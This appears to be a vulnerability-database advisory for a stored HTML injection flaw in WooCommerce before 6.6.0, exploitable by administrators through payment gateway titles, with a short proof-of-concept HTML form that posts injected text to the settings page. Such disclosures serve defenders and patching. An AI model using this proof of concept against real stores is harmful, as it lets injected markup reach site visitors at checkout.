WordPress Plugin Vulnerabilities
WooCommerce < 6.6.0 - Admin+ Stored HTML Injection
Description
The plugin is vulnerable to stored HTML injection due to lack of escaping and sanitizing in the payment gateway titles
Proof of Concept
Go to WooCommerce -> Settings -> Payments tab, enable BAC (Bank Account Transfers) and edit the title in the setup dialog. HTML can be injected there, and will be rendered both for admins (in the admin panel) and visitors in the checkout screen.
<html>
<form action="http://example.com/wp-admin/admin.php?page=wc-settings&tab=checkout§ion=bacs" method="POST">
<input class="input-text regular-input " type="text" name="woocommerce_bacs_title" id="woocommerce_bacs_title" style="" value="HTML INJECTION" placeholder="">
<p class="submit">
<button name="save" class="button-primary woocommerce-save-button" type="submit" value="Save changes">Save changes</button>
<input type="hidden" id="_wpnonce" name="_wpnonce" value="bfdcc984ec"><input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wc-settings&tab=checkout&section=bacs"> </p>
</form>
</html> Affects Plugins
Fixed in version 6.6.0
References
Classification
Type
INJECTION
OWASP top 10
Miscellaneous
Original Researcher
Taurus Omar
Submitter
Taurus Omar
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-06-20 (about 9 months ago)
Added
2022-06-20 (about 9 months ago)
Last Updated
2022-06-21 (about 9 months ago)